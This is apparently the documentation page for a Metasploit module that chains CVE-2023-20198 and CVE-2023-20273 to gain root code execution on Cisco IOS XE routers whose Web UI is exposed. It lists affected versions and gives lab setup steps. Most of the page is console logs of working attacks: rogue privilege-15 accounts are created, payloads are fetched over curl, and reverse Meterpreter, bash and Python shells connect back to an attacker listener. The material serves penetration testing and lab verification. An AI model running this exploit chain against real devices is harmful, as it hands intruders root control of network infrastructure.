cgranleese-r7
19 KiB
19 KiB
Vulnerable Application
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE devices which have the Web UI exposed. An attacker can execute a payload with root privileges.
The vulnerable IOS XE versions are: 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, 17.11.99SW
NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.
Testing
This module was tested against IOS XE version 16.12.3 and version 17.3.2 running on a CSR1000v appliance. To test this module you will need to either:
- Acquire a hardware device running one of the vulnerable firmware versions listed above.
Or
- Setup a virtualized environment.
- A CSR1000V device can be virtualized using GNS3 and VMWare Workstation/Player. Follow the Windows setup guide to install GNS3 and the topology guide to learn how GNS3 can be used.
- A suitable firmware image for testing would be
csr1000v-universalk9.16.12.03-serial.qcow2. - When setting up GNS3, run the
GNS3 2.2.43Virtual Machine for deploying QEMU based devices. - Create a new CSR1000v instance as a QEMU device.
- The CSR1000v device's first ethernet adapter
Gi1should be connected to a Cloud device, whose adapter was bridged to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to be accessible to a remote attacker. - When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
the device:
Router>enable Router#config Router(config)#ip http server router(config)#ip http secure-server router(config)#ip http authentication local router(config)#username admin privilege 15 secret qwerty router(config)#exit Router#copy running-config startup-config - You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty
Verification Steps
- Start msfconsole
use exploit/linux/misc/cisco_ios_xe_rceset RHOST <TARGET_IP_ADDRESS>set target 0set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcpcheckexploit
Options
CISCO_VRF_NAME
We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of 'global' should work, but exposing this as an option will allow for usage in more complex network setups. A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to inspect a devices configuration to see an appropriate VRF to use.
CISCO_CMD_TIMEOUT
We may need to try and execute a command a second time if it fails the first time. This option is the maximum number of seconds to keep trying.
Scenarios
To support a broad set of available payloads, we support both a Linux target and a Unix Target (IOS XE is Linux based). This allows for native Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
Linux Command (IOS XE 17.3.2)
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
RHOSTS => 192.168.86.113
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options
Module options (exploit/linux/misc/cisco_ios_xe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.113 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS false yes Attempt to run payload without touching disk, Linux ≥3.17 only
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_FILELESS is false:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME vsLOEPPqU no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.113:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'vTakCDWG' with password 'RJQHKnKK'
[*] Removing user 'vTakCDWG'
[*] Sending stage (3045380 bytes) to 192.168.86.113
[*] Meterpreter session 5 opened (192.168.86.122:4444 -> 192.168.86.113:56702) at 2025-03-03 20:31:39 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : testc100v
OS : (Linux 4.19.106)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'VltpvRrx' with password 'KDJGXORf'
[*] Removing user 'VltpvRrx'
[*] Sending stage (38 bytes) to 192.168.86.113
[*] Command shell session 6 opened (192.168.86.122:4444 -> 192.168.86.113:56736) at 2025-03-03 20:32:52 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.113 - Command shell session 6 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) >
Linux Command (IOS XE 16.12.3)
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
RHOSTS => 192.168.86.114
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options
Module options (exploit/linux/misc/cisco_ios_xe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.114 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS false yes Attempt to run payload without touching disk, Linux ≥3.17 only
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_FILELESS is false:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME UoDekiVI no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'XpJaBQIt' with password 'qEBrzlDh'
[*] Removing user 'XpJaBQIt'
[*] Sending stage (3045380 bytes) to 192.168.86.114
[*] Meterpreter session 7 opened (192.168.86.122:4444 -> 192.168.86.114:61922) at 2025-03-03 20:34:05 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : test2_c1000v
OS : (Linux 4.19.64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'vmoCbNcA' with password 'UgDnLaCG'
[*] Removing user 'vmoCbNcA'
[*] Sending stage (38 bytes) to 192.168.86.114
[*] Command shell session 8 opened (192.168.86.122:4444 -> 192.168.86.114:61940) at 2025-03-03 20:34:58 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.114 - Command shell session 8 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) >
Unix Target (IOS XE 17.3.2)
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
RHOSTS => 192.168.86.113
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'edGjwUsF' with password 'hhOLNNrX'
[*] Removing user 'edGjwUsF'
[*] Sending stage (24772 bytes) to 192.168.86.113
[*] Meterpreter session 9 opened (192.168.86.122:4444 -> 192.168.86.113:56770) at 2025-03-03 20:36:00 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : testc100v
OS : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
Architecture : x64
Meterpreter : python/linux
meterpreter >
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'mXsKBwvG' with password 'gCUirrkj'
[*] Removing user 'mXsKBwvG'
[*] Command shell session 10 opened (192.168.86.122:4444 -> 192.168.86.113:56802) at 2025-03-03 20:36:39 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.113 - Command shell session 10 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) >
Unix Target (IOS XE 16.12.3)
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
RHOSTS => 192.168.86.114
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options
Module options (exploit/linux/misc/cisco_ios_xe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.114 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Unix Command
View the full module info with the info, or info -d command.
msf exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'vhQbLuix' with password 'JAjuUVov'
[*] Removing user 'vhQbLuix'
[*] Sending stage (24772 bytes) to 192.168.86.114
[*] Meterpreter session 11 opened (192.168.86.122:4444 -> 192.168.86.114:61966) at 2025-03-03 20:37:36 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : test2_c1000v
OS : Linux 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019
Architecture : x64
Meterpreter : python/linux
meterpreter >
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'JJgILIEn' with password 'EkMpGWih'
[*] Removing user 'JJgILIEn'
[*] Command shell session 12 opened (192.168.86.122:4444 -> 192.168.86.114:61982) at 2025-03-03 20:38:16 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.114 - Command shell session 12 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) >